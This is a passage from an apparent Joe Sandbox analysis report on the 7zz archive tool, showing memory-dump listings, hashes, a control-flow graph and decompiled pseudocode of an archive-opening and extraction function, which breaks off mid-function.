                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: CreateDirectoryH_prolog$ApisFile
                                                                      • String ID:
                                                                      • API String ID: 299956159-0
                                                                      • Opcode ID: c1ed0e35f6580321ac6531ab909d6ea8b72f2d8cf8691d9e8c9056453fa2db36
                                                                      • Instruction ID: 5baa69c7bf3f06f08d1d002de2e3150f630ab666195b0682027b480874592da2
                                                                      • Opcode Fuzzy Hash: c1ed0e35f6580321ac6531ab909d6ea8b72f2d8cf8691d9e8c9056453fa2db36
                                                                      • Instruction Fuzzy Hash: 17119032E441059ACB14AFA5E8825AEBB79AF80314F10443FE405B32D2CB380E459BA9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00415D31 Relevance: 6.0, APIs: 1, Strings: 2, Instructions: 726COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 2185 415d31-415d94 call 46b890 call 404ad0 2190 415d96-415d99 2185->2190 2191 415d9b-415d9e 2185->2191 2192 415da1-415da8 2190->2192 2191->2192 2193 415e28-415e3e call 4079f2 2192->2193 2194 415daa-415dc7 call 40351a 2192->2194 2201 415e40-415e47 call 41669f 2193->2201 2202 415e73 2193->2202 2199 415dc9-415de1 call 40b431 2194->2199 2200 415ded-415e26 call 42389f call 407a18 2194->2200 2212 415de3-415deb 2199->2212 2213 415e49-415e59 call 46b8f4 2199->2213 2200->2193 2200->2194 2204 415e75-415e80 2201->2204 2202->2204 2209 415e82-415e84 2204->2209 2210 415e88-415ed4 2204->2210 2209->2210 2215 415f10-415f16 2210->2215 2216 415ed6-415eea 2210->2216 2212->2200 2220 415e5e-415e6e call 46b8f4 2212->2220 2213->2220 2218 415f1c-415f3c call 40351a 2215->2218 2219 4163df-416441 2215->2219 2216->2215 2229 415eec-415ef1 2216->2229 2230 415f4f-415f61 call 40b431 2218->2230 2231 415f3e-415f4d 2218->2231 2224 416443-416445 2219->2224 2225 416449-416458 call 408604 2219->2225 2220->2202 2224->2225 2238 41645a-416468 2225->2238 2233 415ef3-415ef5 2229->2233 2234 415ef9-415f0b call 408604 2229->2234 2241 415f67-415f6f 2230->2241 2242 41668a-41669a call 46b8f4 2230->2242 2236 415f75-415f90 2231->2236 2233->2234 2234->2238 2246 415f96-415fd7 call 4033db call 404ad0 call 40862d call 443f76 2236->2246 2247 41646b-416479 call 407a18 2236->2247 2241->2236 2241->2242 2263 416118-41613f call 418a23 2246->2263 2264 415fdd-415fe5 2246->2264 2252 416481-416484 2247->2252 2253 41647b-41647d 2247->2253 2256 416674-416685 call 408604 2252->2256 2253->2252 2256->2238 2269 416145-41616f call 46c55c 2263->2269 2270 416489-4164b2 call 408604 call 403411 call 407a18 2263->2270 2264->2263 2266 415feb-415fed 2264->2266 2268 415ff1-415ff5 2266->2268 2271 415ff7-415ff9 2268->2271 2272 415fff-416006 2268->2272 2285 416175-416178 2269->2285 2286 4164c4-4164ed call 408604 call 403411 call 407a18 2269->2286 2300 4164b4-4164b6 2270->2300 2301 4164ba-4164bf 2270->2301 2275 416008 2271->2275 2276 415ffb-415ffd 2271->2276 2273 41600c-41600f 2272->2273 2273->2263 2277 416015-41603b call 4072c9 call 417651 2273->2277 2275->2273 2276->2268 2298 416041-416050 call 408053 2277->2298 2299 41610b-416117 call 407a18 2277->2299 2290 4163a8-4163d9 call 408604 call 403411 call 407a18 2285->2290 2291 41617e-416183 2285->2291 2328 4164f5-4164f8 2286->2328 2329 4164ef-4164f1 2286->2329 2290->2218 2290->2219 2296 416213 2291->2296 2297 416189-416192 2291->2297 2302 416219 2296->2302 2297->2302 2305 416198-4161b1 call 40373d 2297->2305 2298->2299 2319 416056-41608a call 407399 call 401e26 call 407a18 2298->2319 2299->2263 2300->2301 2301->2256 2308 416247-41626f call 401e9a 2302->2308 2309 41621b-416241 2302->2309 2324 4161b3-4161b9 2305->2324 2325 416205-416211 2305->2325 2336 416275-416278 2308->2336 2337 416536-416568 call 407a18 call 408604 call 403411 call 407a18 2308->2337 2309->2308 2327 4164fd-416526 call 408604 call 403411 call 407a18 2309->2327 2319->2299 2354 41608c-41608f 2319->2354 2324->2325 2331 4161bb-416202 call 408784 2324->2331 2325->2296 2325->2305 2368 416528-41652a 2327->2368 2369 41652e-416531 2327->2369 2328->2256 2329->2328 2331->2325 2342 416291-41629c 2336->2342 2343 41627a-41628b 2336->2343 2400 416570-416573 2337->2400 2401 41656a-41656c 2337->2401 2350 4162d5-4162e7 2342->2350 2351 41629e-4162ad 2342->2351 2343->2342 2366 416578-4165aa call 407a18 call 408604 call 403411 call 407a18 2343->2366 2355 4162f3 2350->2355 2356 4162e9-4162ec 2350->2356 2352 4162c7-4162d3 2351->2352 2353 4162af-4162c1 2351->2353 2352->2350 2352->2351 2353->2352 2377 4165ba-4165ec call 407a18 call 408604 call 403411 call 407a18 2353->2377 2362 416093-416097 2354->2362 2364 4162f5-416332 call 416922 2355->2364 2356->2355 2363 4162ee-4162f1 2356->2363 2372 4160a1-4160a5 2362->2372 2373 416099-41609b 2362->2373 2363->2364 2381 416337-41633c 2364->2381 2423 4165b2-4165b5 2366->2423 2424 4165ac-4165ae 2366->2424 2368->2369 2369->2256 2380 4160aa-4160ac 2372->2380 2378 4160a7 2373->2378 2379 41609d-41609f 2373->2379 2433 4165f4-4165f7 2377->2433 2434 4165ee-4165f0 2377->2434 2378->2380 2379->2362 2380->2299 2384 4160ae-4160e2 call 4072c9 call 417651 call 407a18 2380->2384 2385 416342-416347 2381->2385 2386 4165f9-41662b call 407a18 call 408604 call 403411 call 407a18 2381->2386 2384->2299 2429 4160e4-4160f3 call 40807a 2384->2429 2392 416369-41636c 2385->2392 2393 416349-416367 2385->2393 2437 416633-416636 2386->2437 2438 41662d-41662f 2386->2438 2399 41636f-41639c 2392->2399 2393->2399 2407 4163a2-4163a7 call 407a18 2399->2407 2408 416638-416667 call 407a18 call 408604 call 403411 call 407a18 2399->2408 2400->2256 2401->2400 2407->2290 2445 416669-41666b 2408->2445 2446 41666f 2408->2446 2423->2256 2424->2423 2429->2299 2440 4160f5-416106 call 415c6d * 2 2429->2440 2433->2256 2434->2433 2437->2256 2438->2437 2440->2299 2445->2446 2446->2256
                                                                      C-Code - Quality: 87%
                                                                      			E00415D31(intOrPtr __ecx, signed int __edx, void* __eflags) {
				signed int _t453;
				signed int _t454;
				intOrPtr _t465;
				signed int _t468;
				signed int _t477;
				intOrPtr* _t485;
				signed int _t486;
				signed int _t487;
				signed char _t491;
				signed int _t496;
				intOrPtr _t505;
				signed int _t509;
				signed int _t519;
				signed int _t532;
				signed int _t539;
				signed int _t540;
				signed int _t544;
				intOrPtr _t553;
				intOrPtr _t554;
				intOrPtr _t563;
				signed int _t565;
				signed int _t573;
				signed int* _t581;
				signed int _t582;
				signed int _t589;
				signed int _t601;
				short* _t602;
				signed int _t610;
				signed int _t612;
				void* _t614;
				signed int _t617;
				signed int _t618;
				signed int _t620;
				void* _t623;
				signed int _t626;
				signed int* _t631;
				signed int _t632;
				signed int _t661;
				char* _t662;
				signed int _t669;
				intOrPtr* _t670;
				intOrPtr* _t671;
				intOrPtr* _t672;
				intOrPtr _t714;
				signed int* _t724;
				signed int _t747;
				void* _t748;
				intOrPtr _t756;
				signed int _t770;
				signed int _t771;
				signed int _t780;
				signed int _t785;
				signed int _t786;
				signed int _t788;
				signed int _t790;
				void* _t791;

				_t770 = __edx;
				E0046B890(E004749BF, _t791);
				_t780 =  *(_t791 + 0x24);
				 *((intOrPtr*)(_t791 - 0x34)) = __ecx;
				 *((intOrPtr*)(_t791 - 0x4c)) = __edx;
				 *((intOrPtr*)(_t780 + 0x20)) = 0;
				 *((intOrPtr*)(_t780 + 0x18)) = 0;
				 *((intOrPtr*)(_t780 + 0x10)) = 0;
				 *((intOrPtr*)(_t780 + 8)) = 0;
				 *_t780 = 0;
				 *((intOrPtr*)(_t780 + 0x24)) = 0;
				 *((intOrPtr*)(_t780 + 0x1c)) = 0;
				 *((intOrPtr*)(_t780 + 0x14)) = 0;
				 *((intOrPtr*)(_t780 + 0xc)) = 0;
				 *(_t780 + 4) = 0;
				 *((intOrPtr*)(_t780 + 0x28)) = 0;
				 *(_t791 - 0x18) = 0;
				 *(_t791 - 0x14) = 0;
				E00404AD0(_t791 - 0xe8, 8);
				 *((intOrPtr*)(_t791 - 0xe8)) = 0x47a688;
				 *(_t791 - 4) = 0;
				if( *( *(_t791 + 0x14)) == 0) {
					_t453 =  *( *((intOrPtr*)(_t791 + 8)) + 8);
				} else {
					_t453 = 1;
				}
				_t785 = 0;
				 *(_t791 - 0x24) = _t453;
				if(_t453 <= 0) {
					L8:
					_push(0xf8);
					_t454 = E004079F2();
					_t661 = _t454;
					 *(_t791 + 0x24) = _t661;
					 *(_t791 - 4) = 2;
					if(_t661 == 0) {
						goto L12;
					} else {
						L112();
						_t786 = _t454;
					}
				} else {
					do {
						E0040351A(_t791 - 0x70);
						 *(_t791 - 4) = 1;
						 *(_t791 - 0x98) = 0;
						 *((intOrPtr*)(_t791 - 0x94)) = 0;
						_t801 =  *( *(_t791 + 0x14));
						if( *( *(_t791 + 0x14)) != 0) {
							goto L7;
						} else {
							_push( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t791 + 8)) + 0xc)) + _t785 * 4)))));
							if(E0040B431(_t791 - 0x98, _t770, _t801) == 0) {
								 *(_t791 + 0x14) = "there is no such archive";
								E0046B8F4(_t791 + 0x14, 0x47cf70);
								L11:
								 *(_t791 + 0x14) = "can\'t decompress folder";
								E0046B8F4(_t791 + 0x14, 0x47cf70);
								L12:
								_t786 = 0;
								__eflags = 0;
							} else {
								if(( *(_t791 - 0x78) >> 0x00000004 & 0x00000001) != 0) {
									goto L11;
								} else {
									goto L7;
								}
							}
						}
						goto L13;
						L7:
						E0042389F(_t791 - 0xe8,  *(_t791 - 0x98),  *((intOrPtr*)(_t791 - 0x94)));
						 *(_t791 - 0x18) =  *(_t791 - 0x18) +  *(_t791 - 0x98);
						 *(_t791 - 4) = 0;
						asm("adc [ebp-0x14], ecx");
						E00407A18( *((intOrPtr*)(_t791 - 0x70)));
						_t785 = _t785 + 1;
					} while (_t785 <  *(_t791 - 0x24));
					goto L8;
				}
				L13:
				 *(_t791 - 4) = 0;
				 *(_t791 - 0xec) = _t786;
				if(_t786 != 0) {
					 *((intOrPtr*)( *_t786 + 4))(_t786);
				}
				_t662 =  *(_t791 + 0x14);
				 *(_t791 - 4) = 3;
				_t771 = _t770 & 0xffffff00 |  *(_t791 - 0x24) - 0x00000001 > 0x00000000;
				 *((intOrPtr*)(_t786 + 0xe8)) = 0;
				 *((intOrPtr*)(_t786 + 0xe0)) = 0;
				 *((intOrPtr*)(_t786 + 0xd8)) = 0;
				 *(_t786 + 0xbb) = _t771;
				 *(_t786 + 0x30) = _t662[8];
				 *(_t786 + 0x34) = _t662[0xc];
				 *((intOrPtr*)(_t786 + 0xec)) = 0;
				 *((intOrPtr*)(_t786 + 0xe4)) = 0;
				 *((intOrPtr*)(_t786 + 0xdc)) = 0;
				 *((intOrPtr*)(_t786 + 0xf0)) = 0;
				if(_t771 == 0) {
					L20:
					__eflags =  *(_t791 - 0x24);
					 *(_t791 - 0x20) = 0;
					if( *(_t791 - 0x24) <= 0) {
						L79:
						__eflags = _t786;
						 *((intOrPtr*)(_t780 + 0x18)) =  *((intOrPtr*)(_t786 + 0xd8));
						 *((intOrPtr*)(_t780 + 0x1c)) =  *((intOrPtr*)(_t786 + 0xdc));
						 *((intOrPtr*)(_t780 + 0x20)) =  *((intOrPtr*)(_t786 + 0xe0));
						 *((intOrPtr*)(_t780 + 0x24)) =  *((intOrPtr*)(_t786 + 0xe4));
						 *((intOrPtr*)(_t780 + 8)) =  *((intOrPtr*)(_t786 + 0xe8));
						 *((intOrPtr*)(_t780 + 0xc)) =  *((intOrPtr*)(_t786 + 0xec));
						 *((intOrPtr*)(_t780 + 0x28)) =  *((intOrPtr*)(_t786 + 0xf0));
						 *(_t791 - 4) = 0;
						asm("cdq");
						 *_t780 =  *( *((intOrPtr*)(_t791 + 8)) + 8);
						 *(_t780 + 4) = _t771;
						_t465 =  *((intOrPtr*)(_t786 + 0xd0));
						 *((intOrPtr*)(_t780 + 0x10)) =  *((intOrPtr*)(_t465 + 0x20));
						 *((intOrPtr*)(_t780 + 0x14)) =  *((intOrPtr*)(_t465 + 0x24));
						if(_t786 != 0) {
							 *((intOrPtr*)( *_t786 + 8))(_t786);
						}
						 *(_t791 - 4) =  *(_t791 - 4) | 0xffffffff;
						E00408604(_t791 - 0xe8);
						_t468 = 0;
						__eflags = 0;
						goto L82;
					} else {
						do {
							 *(_t791 + 0x24) =  *( *((intOrPtr*)( *((intOrPtr*)(_t791 + 8)) + 0xc)) +  *(_t791 - 0x20) * 4);
							E0040351A(_t791 - 0x70);
							 *(_t791 - 4) = 4;
							__eflags =  *( *(_t791 + 0x14));
							if(__eflags == 0) {
								_t669 = _t791 - 0x98;
								_push( *( *(_t791 + 0x24)));
								_t477 = E0040B431(_t669, _t771, __eflags);
								__eflags = _t477;
								if(_t477 == 0) {
									L111:
									 *(_t791 + 0x14) = "there is no such archive";
									E0046B8F4(_t791 + 0x14, 0x47cf70);
									E0046B890(E00474A50, _t791);
									_push(_t669);
									_push(_t669);
									_push(0);
									_push(_t786);
									_t788 = _t669;
									_push(_t780);
									 *(_t791 - 0x10) = _t788;
									 *_t788 = 0x47ab60;
									 *((intOrPtr*)(_t788 + 4)) = 0x47a78c;
									 *((intOrPtr*)(_t788 + 8)) = 0x47ab50;
									 *((intOrPtr*)(_t788 + 0xc)) = 0;
									 *((intOrPtr*)(_t788 + 0x18)) = 0;
									 *(_t791 - 4) = 0;
									 *((intOrPtr*)(_t788 + 0x1c)) = 0;
									 *((intOrPtr*)(_t788 + 0x20)) = 0;
									_t670 = _t788 + 0x24;
									 *(_t791 - 4) = 2;
									 *_t670 = 0;
									 *((intOrPtr*)(_t670 + 4)) = 0;
									 *((intOrPtr*)(_t670 + 8)) = 0;
									E00401E9A(_t670, 3);
									_t671 = _t788 + 0x38;
									 *(_t791 - 4) = 3;
									 *_t671 = 0;
									 *((intOrPtr*)(_t671 + 4)) = 0;
									 *((intOrPtr*)(_t671 + 8)) = 0;
									E00401E9A(_t671, 3);
									_t672 = _t788 + 0x44;
									 *(_t791 - 4) = 4;
									 *_t672 = 0;
									 *((intOrPtr*)(_t672 + 4)) = 0;
									 *((intOrPtr*)(_t672 + 8)) = 0;
									E00401E9A(_t672, 3);
									 *((char*)(_t788 + 0x5a)) = 1;
									 *((char*)(_t788 + 0x5b)) = 1;
									 *((char*)(_t788 + 0x5c)) = 1;
									 *((intOrPtr*)(_t788 + 0x98)) = 0;
									 *((intOrPtr*)(_t788 + 0xa0)) = 0;
									_t485 = _t788 + 0xa4;
									 *((intOrPtr*)(_t485 + 4)) = 0;
									 *((intOrPtr*)(_t485 + 8)) = 0;
									 *((intOrPtr*)(_t485 + 0xc)) = 0;
									 *((intOrPtr*)(_t485 + 0x10)) = 4;
									 *_t485 = 0x47a420;
									_t782 = _t788 + 0xbc;
									 *((char*)(_t788 + 0xbb)) = 0;
									 *((intOrPtr*)(_t788 + 0xbc)) = 0;
									_push(0x38);
									 *(_t791 - 4) = 9;
									 *_t788 = 0x47ab30;
									 *((intOrPtr*)(_t788 + 4)) = 0x47ab20;
									 *((intOrPtr*)(_t788 + 8)) = 0x47ab10;
									_t486 = E004079F2();
									 *(_t791 - 0x14) = _t486;
									__eflags = _t486;
									 *(_t791 - 4) = 0xa;
									if(_t486 == 0) {
										_t487 = 0;
										__eflags = 0;
									} else {
										_t487 = E0040F3E5(_t486);
									}
									 *(_t791 - 4) = 9;
									 *((intOrPtr*)(_t788 + 0xd0)) = _t487;
									E0040C9B4(_t782, _t487);
									 *[fs:0x0] =  *((intOrPtr*)(_t791 - 0xc));
									return _t788;
								} else {
									_t491 =  *(_t791 - 0x78) >> 4;
									__eflags = _t491 & 0x00000001;
									if((_t491 & 0x00000001) != 0) {
										goto L111;
									} else {
										goto L25;
									}
								}
							} else {
								 *(_t791 - 0x98) = 0;
								 *((intOrPtr*)(_t791 - 0x94)) = 0;
								 *(_t791 - 0x78) = 0;
								L25:
								 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t791 + 0x18)))) + 0x18))();
								_t496 =  *((intOrPtr*)( *( *(_t791 + 0x1c)) + 0x24))( *( *(_t791 + 0x24)));
								__eflags = _t496;
								 *(_t791 - 0x1c) = _t496;
								if(_t496 != 0) {
									E00407A18( *((intOrPtr*)(_t791 - 0x70)));
									__eflags = _t786;
									 *(_t791 - 4) = 0;
									if(_t786 != 0) {
										 *((intOrPtr*)( *_t786 + 8))(_t786);
									}
									_t790 =  *(_t791 - 0x1c);
									goto L110;
								} else {
									E004033DB(_t791 - 0xd4);
									 *(_t791 - 4) = 5;
									E00404AD0(_t791 - 0x48, 4);
									 *(_t791 - 4) = 6;
									 *((intOrPtr*)(_t791 - 0x48)) = 0x47a668;
									E0040862D();
									_push( *((intOrPtr*)(_t791 - 0x4c)));
									L00443F76(_t791 - 0x48);
									_t505 =  *((intOrPtr*)(_t791 - 0x4c));
									 *(_t791 - 4) = 7;
									__eflags =  *(_t505 + 8);
									if( *(_t505 + 8) == 0) {
										_t747 =  *(_t791 + 0x24);
										_t601 =  *(_t747 + 4);
										__eflags = _t601;
										if(_t601 != 0) {
											_t748 =  *_t747;
											_t602 = _t748 + _t601 * 2 - 2;
											while(1) {
												__eflags =  *_t602 - 0x2e;
												if( *_t602 == 0x2e) {
													break;
												}
												__eflags = _t602 - _t748;
												if(_t602 == _t748) {
													_t125 = _t791 - 0x10;
													 *_t125 =  *(_t791 - 0x10) | 0xffffffff;
													__eflags =  *_t125;
												} else {
													_t602 = _t602;
													continue;
												}
												L34:
												__eflags =  *(_t791 - 0x10);
												if( *(_t791 - 0x10) >= 0) {
													E004072C9( *(_t791 + 0x24), _t791 - 0x58,  *(_t791 - 0x10) + 1);
													 *(_t791 - 4) = 8;
													_t610 = E00417651( *((intOrPtr*)(_t791 - 0x34)), _t791 - 0x58);
													__eflags = _t610;
													 *(_t791 - 0x1c) = _t610;
													if(_t610 >= 0) {
														_t612 = E00408053( *((intOrPtr*)(_t791 - 0x58)), L"001");
														__eflags = _t612;
														if(_t612 == 0) {
															_t614 = E00407399( *(_t791 + 0x24), _t791 - 0x104,  *(_t791 - 0x10));
															 *(_t791 - 4) = 9;
															E00401E26(_t791 - 0x58, _t614);
															 *(_t791 - 4) = 8;
															E00407A18( *((intOrPtr*)(_t791 - 0x104)));
															_t617 =  *(_t791 - 0x54);
															__eflags = _t617;
															if(_t617 != 0) {
																_t756 =  *((intOrPtr*)(_t791 - 0x58));
																_t618 = _t756 + _t617 * 2 - 2;
																while(1) {
																	__eflags =  *_t618 - 0x2e;
																	if( *_t618 == 0x2e) {
																		break;
																	}
																	__eflags = _t618 - _t756;
																	if(_t618 == _t756) {
																		_t620 = _t618 | 0xffffffff;
																		__eflags = _t620;
																	} else {
																		_t618 = _t618;
																		continue;
																	}
																	L44:
																	__eflags = _t620;
																	if(_t620 >= 0) {
																		_t623 = E004072C9(_t791 - 0x58, _t791 - 0xf8, _t620 + 1);
																		 *(_t791 - 4) = 0xa;
																		 *(_t791 - 0x10) = E00417651( *((intOrPtr*)(_t791 - 0x34)), _t623);
																		 *(_t791 - 4) = 8;
																		E00407A18( *((intOrPtr*)(_t791 - 0xf8)));
																		__eflags =  *(_t791 - 0x10);
																		if( *(_t791 - 0x10) >= 0) {
																			_t626 = E0040807A(L"rar");
																			__eflags = _t626;
																			if(_t626 != 0) {
																				E00415C6D(_t791 - 0x48,  *(_t791 - 0x10));
																				E00415C6D(_t791 - 0x48,  *(_t791 - 0x1c));
																			}
																		}
																	}
																	goto L48;
																}
																_t620 = _t618 - _t756 >> 1;
																goto L44;
															}
														}
													}
													L48:
													 *(_t791 - 4) = 7;
													E00407A18( *((intOrPtr*)(_t791 - 0x58)));
												}
												goto L49;
											}
											 *(_t791 - 0x10) = _t602 - _t748 >> 1;
											goto L34;
										}
									}
									L49:
									_push( *((intOrPtr*)(_t791 + 0x18)));
									_push( *(_t791 + 0x24));
									_push(0);
									_push( *( *(_t791 + 0x14)));
									_push(_t791 - 0x48);
									_push( *((intOrPtr*)(_t791 - 0x34)));
									_t509 = E00418A23(_t791 - 0xd4); // executed
									__eflags = _t509 - 0x80004004;
									 *(_t791 - 0x10) = _t509;
									if(_t509 == 0x80004004) {
										 *(_t791 - 4) = 5;
										E00408604(_t791 - 0x48);
										 *(_t791 - 4) = 4;
										E00403411(_t791 - 0xd4);
										E00407A18( *((intOrPtr*)(_t791 - 0x70)));
										__eflags = _t786;
										 *(_t791 - 4) = 0;
										if(_t786 != 0) {
											 *((intOrPtr*)( *_t786 + 8))(_t786);
										}
										_t790 = 0x80004004;
										goto L110;
									} else {
										 *((char*)(_t791 - 0x9c)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t791 + 0x18)))) + 0x14))();
										_t771 =  *( *(_t791 + 0x1c));
										_t519 =  *((intOrPtr*)(_t771 + 0x28))( *( *(_t791 + 0x24)),  *(_t791 - 0x10),  *((intOrPtr*)(_t791 - 0x9c)));
										__eflags = _t519;
										 *(_t791 + 0x24) = _t519;
										if(_t519 != 0) {
											 *(_t791 - 4) = 5;
											E00408604(_t791 - 0x48);
											 *(_t791 - 4) = 4;
											E00403411(_t791 - 0xd4);
											E00407A18( *((intOrPtr*)(_t791 - 0x70)));
											__eflags = _t786;
											 *(_t791 - 4) = 0;
											if(_t786 != 0) {
												 *((intOrPtr*)( *_t786 + 8))(_t786);
											}
											_t790 =  *(_t791 + 0x24);
											goto L110;
										} else {
											__eflags =  *(_t791 - 0x10);
											if( *(_t791 - 0x10) != 0) {
												goto L78;
											} else {
												__eflags =  *( *(_t791 + 0x14));
												if( *( *(_t791 + 0x14)) != 0) {
													L58:
													__eflags =  *(_t791 - 0xb8);
												} else {
													__eflags =  *(_t791 - 0xb8);
													 *(_t791 - 0x10) = 0;
													if(__eflags > 0) {
														do {
															_t589 = E0040373D(_t771,  *((intOrPtr*)( *((intOrPtr*)(_t791 - 0xb4)) +  *(_t791 - 0x10) * 4)));
															__eflags = _t589;
															 *(_t791 + 0x24) = _t589;
															if(_t589 >= 0) {
																__eflags =  *(_t791 + 0x24) -  *(_t791 - 0x20);
																if( *(_t791 + 0x24) >  *(_t791 - 0x20)) {
																	 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t791 + 8)))) + 4))( *(_t791 + 0x24), 1);
																	 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t791 + 0xc)))) + 4))( *(_t791 + 0x24), 1);
																	_t201 = _t791 - 0x18;
																	 *_t201 =  *(_t791 - 0x18) -  *((intOrPtr*)( *((intOrPtr*)(_t791 - 0xdc)) +  *(_t791 + 0x24) * 8));
																	__eflags =  *_t201;
																	asm("sbb [ebp-0x14], eax");
																	E00408784(_t791 - 0xe8,  *(_t791 + 0x24), 1);
																	 *(_t791 - 0x24) =  *( *((intOrPtr*)(_t791 + 8)) + 8);
																}
															}
															 *(_t791 - 0x10) =  *(_t791 - 0x10) + 1;
															__eflags =  *(_t791 - 0x10) -  *(_t791 - 0xb8);
														} while ( *(_t791 - 0x10) <  *(_t791 - 0xb8));
														goto L58;
													}
												}
												if(__eflags == 0) {
													L61:
													 *((intOrPtr*)(_t791 - 0x30)) = 0;
													 *(_t791 - 0x2c) = 0;
													 *((intOrPtr*)(_t791 - 0x28)) = 0;
													E00401E9A(_t791 - 0x30, 3);
													 *(_t791 - 4) = 0xb;
													_t532 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t791 + 0x18)))) + 0x10))(_t791 - 0x30);
													__eflags = _t532;
													 *(_t791 + 0x24) = _t532;
													if(_t532 != 0) {
														E00407A18( *((intOrPtr*)(_t791 - 0x30)));
														 *(_t791 - 4) = 5;
														E00408604(_t791 - 0x48);
														 *(_t791 - 4) = 4;
														E00403411(_t791 - 0xd4);
														E00407A18( *((intOrPtr*)(_t791 - 0x70)));
														__eflags = _t786;
														 *(_t791 - 4) = 0;
														if(_t786 != 0) {
															 *((intOrPtr*)( *_t786 + 8))(_t786);
														}
														_t790 =  *(_t791 + 0x24);
														goto L110;
													} else {
														__eflags =  *(_t791 - 0x2c);
														if( *(_t791 - 0x2c) == 0) {
															L64:
															_t539 =  *(_t791 - 0xcc);
															 *(_t791 + 0x24) = 0;
															__eflags = _t539;
															if(_t539 <= 0) {
																L68:
																_t540 =  *( *((intOrPtr*)(_t791 - 0xc8)) + _t539 * 4 - 4);
																 *(_t791 + 0x24) = _t540;
																__eflags =  *( *(_t791 + 0x14));
																if( *( *(_t791 + 0x14)) != 0) {
																	L71:
																	__eflags = 0;
																} else {
																	__eflags =  *(_t791 - 0x74);
																	if(__eflags != 0) {
																		goto L71;
																	} else {
																		_push(1);
																		_pop(0);
																	}
																}
																 *((char*)(_t540 + 0x2c)) = 0;
																 *((intOrPtr*)(_t540 + 0x24)) =  *((intOrPtr*)(_t791 - 0x80));
																 *((intOrPtr*)(_t540 + 0x28)) =  *((intOrPtr*)(_t791 - 0x7c));
																asm("adc ecx, [ebp-0x94]");
																_t544 = E00416922( *(_t791 + 0x24),  *((intOrPtr*)(_t791 + 0x10)), __eflags,  *((intOrPtr*)(_t791 - 0xac)) +  *(_t791 - 0x98),  *(_t791 - 0xa8),  *(_t791 + 0x14),  *(_t791 + 0x1c), _t786,  *((intOrPtr*)(_t791 + 0x20)), _t791 - 0x60); // executed
																__eflags = _t544;
																 *(_t791 + 0x24) = _t544;
																if(_t544 != 0) {
																	E00407A18( *((intOrPtr*)(_t791 - 0x30)));
																	 *(_t791 - 4) = 5;
																	E00408604(_t791 - 0x48);
																	 *(_t791 - 4) = 4;
																	E00403411(_t791 - 0xd4);
																	E00407A18( *((intOrPtr*)(_t791 - 0x70)));
																	__eflags = _t786;
																	 *(_t791 - 4) = 0;
																	if(_t786 != 0) {
																		 *((intOrPtr*)( *_t786 + 8))(_t786);
																	}
																	_t790 =  *(_t791 + 0x24);
																	goto L110;
																} else {
																	__eflags =  *( *(_t791 + 0x14));
																	if( *( *(_t791 + 0x14)) != 0) {
																		_t771 =  *(_t791 - 0x5c);
																		_t714 =  *((intOrPtr*)(_t791 - 0x60));
																	} else {
																		_t771 =  *(_t791 - 0xa8);
																		_t714 =  *((intOrPtr*)(_t791 - 0xac)) +  *(_t791 - 0x98);
																		asm("adc edx, [ebp-0x94]");
																		 *((intOrPtr*)(_t791 - 0x60)) = _t714;
																		 *(_t791 - 0x5c) = _t771;
																	}
																	 *((intOrPtr*)( *((intOrPtr*)(_t786 + 0xd0)) + 0x20)) =  *((intOrPtr*)( *((intOrPtr*)(_t786 + 0xd0)) + 0x20)) + _t714;
																	asm("adc [eax+0x24], edx");
																	_t553 =  *((intOrPtr*)(_t786 + 0xd0));
																	 *((intOrPtr*)(_t553 + 0x28)) =  *((intOrPtr*)(_t786 + 0xe8));
																	 *((intOrPtr*)(_t553 + 0x2c)) =  *((intOrPtr*)(_t786 + 0xec));
																	_t554 =  *((intOrPtr*)(_t791 + 0x20));
																	_push( *((intOrPtr*)(_t791 - 0x30)));
																	__eflags =  *(_t554 + 4);
																	if( *(_t554 + 4) != 0) {
																		E00407A18();
																		 *(_t791 - 4) = 5;
																		E00408604(_t791 - 0x48);
																		 *(_t791 - 4) = 4;
																		E00403411(_t791 - 0xd4);
																		E00407A18( *((intOrPtr*)(_t791 - 0x70)));
																		__eflags = _t786;
																		 *(_t791 - 4) = 0;
																		if(_t786 != 0) {
																			 *((intOrPtr*)( *_t786 + 8))(_t786);
																		}
																		_t790 = 0x80004005;
																		goto L110;
																	} else {
																		E00407A18();
																		goto L78;
																	}
																}
															} else {
																do {
																	_t563 =  *((intOrPtr*)( *((intOrPtr*)(_t791 - 0xc8)) +  *(_t791 + 0x24) * 4));
																	__eflags =  *(_t563 + 0x34);
																	if( *(_t563 + 0x34) == 0) {
																		goto L67;
																	} else {
																		_t724 =  *(_t791 + 0x1c);
																		_t565 =  *((intOrPtr*)( *_t724 + 0x1c))(_t724,  *((intOrPtr*)(_t563 + 0x30)));
																		__eflags = _t565;
																		 *(_t791 - 0x1c) = _t565;
																		if(_t565 != 0) {
																			E00407A18( *((intOrPtr*)(_t791 - 0x30)));
																			 *(_t791 - 4) = 5;
																			E00408604(_t791 - 0x48);
																			 *(_t791 - 4) = 4;
																			E00403411(_t791 - 0xd4);
																			E00407A18( *((intOrPtr*)(_t791 - 0x70)));
																			__eflags = _t786;
